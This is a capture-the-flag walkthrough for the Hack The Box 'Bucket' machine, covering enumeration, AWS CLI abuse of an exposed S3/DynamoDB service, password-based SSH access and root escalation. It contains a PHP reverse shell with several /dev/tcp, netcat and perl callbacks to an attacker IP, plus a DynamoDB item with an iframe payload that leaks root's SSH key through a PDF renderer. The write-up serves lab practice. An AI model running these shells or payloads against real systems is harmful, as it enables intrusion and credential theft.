Edit: Because of new server the image files for this article are missing.
Enumeration:
Lets start with running nmap. You can see the picture bellow and the command used to obtain that scan.
nmap -T4 -A -Pn 10.10.10.212
From the scan we see that there is a redirect to http://bucket.htb/, So what I did is add it to the /etc/hosts. After go to the domain. I usually check the source to see if there is something interesting. And there it was.
I added this new domain to the hosts file. I checked both places. The next step is to scan for other directories. I used gobuster.
Bellow you can see the command and use it.
sudo gobuster dir -w '/usr/share/wordlists/dirb/big.txt' -t 50 -e -u http://s3.bucket.htb
From the image above you can see that three pages are found. If you try to explore the “shell” page you will not be successful. You need to add a slash in the end and you will be lead to a page with a shell.
This page confirms that the machine is running AWS. Also we can see that the machine uses DynamoDB with AWS services. My next step was to start reading about AWS with DynamoDB. I will give some links here if you want to learn what the commands do. I spend some time reading because I have never worked with this before.
Links:
https://aws.amazon.com/cli/
https://docs.aws.amazon.com/cli/latest/userguide/cli-services-s3-commands.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-creds
https://docs.aws.amazon.com/IAM/latest/UserGuide/getting-started_create-admin-group.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html
First you need to install the awscli. To do that use the command bellow.
apt update && apt install awscli
The next step is to configure the aws cli. The information is in one of the links. In this case we don’t need real Key.
After that is done I enumerated the db to see what we have there. I will post the command but not the result from it, so you can see it for yourself and get the correct information.
aws dynamodb list-tables --endpoint-url http://s3.bucket.htbThe information we get is not used immediately, but still save it in a file, because it is crucial later. The next step is to enumerate Buckets. Use the commands bellow and again I encourage you to read all the documentation in the links and even more to understand how that service works.
aws --endpoint-url http://s3.bucket.htb/ s3 ls
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/images/Foothold:
After some trail and error I found a php reverse shell code that works.
<?php
echo 'running shell';
$ip='10.10.14.14'; #Change this to you HTB IP
$port='1337';
$reverse_shells = array(
'/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
'0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
'/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
"/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
);
foreach ($reverse_shells as $reverse_shell) {
try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
}
system('id');
?>
Save this in a reverse.php file. The following commands will upload the shell:
aws --endpoint-url http://s3.bucket.htb/ s3 cp reverse.php s3://adserver/
Because the machine is cleaned every 30 seconds a bash script will be really helpful. Save the code bellow to reverse.sh
#!/bin/sh
aws --endpoint-url http://s3.bucket.htb/ s3 cp reverse.php s3://adserver/
echo ""
echo "[-] Executing reverse shell...Please run nc listener"
echo "[-] Kill me with Ctrl+C on successful connection"
while [ true ]
do
curl http://bucket.htb/reverse.php &> /dev/null
done
So open two terminal windows now. On one of them you need to run the .sh and on the other you need to listen with netcat. That you should be able to do by yourself. If you have a question about that please leave a comment and I will try to answer ASAP.
USER:
So while I had the shell I browsed a little and got the user name in /home/. That is really good because if you remember we have some passwords from before. So save the username “roy” in one text file. Clean up the passwords and put the in another file called passwords.txt and now you have two options. Use metasploit with a module ‘auxiliary/scanner/ssh/ssh_login’ or try manually each password with that username to ssh as that user. There are not so many so the manual method will work as well. I personally used metasploit.
When you ssh you will find the user flag on the usual place.
If you get stuck join our Discord. Even if you are not stuck join and chat with like minded people.
ROOT:
Getting the root flag was harder then I expected. There was a lot of reading and enumeration. During the enumeration in an index.php file we can see an interesting function.
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
else
{
?>So what now? Well by looking at the code above we can see that it looks for a POST request, create a new instance of DynamoDB client, scans for a table called “alerts” do some work and prints data from the table to a pdf file.
For the next steps I will provide the commands but I still recommend checking out the documentation –> HERE.
Create the needed table.
also have in mind that the spacing are necessary. It took me some time to figure that part out.
aws dynamodb create-table \
--table-name alerts \
--attribute-definitions \
AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema \
AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput \
ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htbPayload:
aws dynamodb put-item \
--table-name alerts \
--item '{
"title": {"S": "Ransomware"},
"data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}
}' \
--return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htbDo this in the terminal that you are sshed in as “roy”
curl --data "action=get_alerts" http://localhost:8000/To download the generated pdf which will contain the ssh key:
scp roy@bucket.htb://var/www/bucket-app/files/result.pdf ./
Open the pdf file copy the key into a text file. Change the permissions of the file (because it is ssh key) and ssh into the machine as root. Use the commands bellow.
sudo chmod 600 keyfilename.txtssh root@bucket.htb -i keyfilename.txtAfter that you can find the root flag. So that was the write up. Even if you have followed it letter by letter read the documentation provided as links. AWS services are widely used and this box felt pretty close to real life, so put the time.
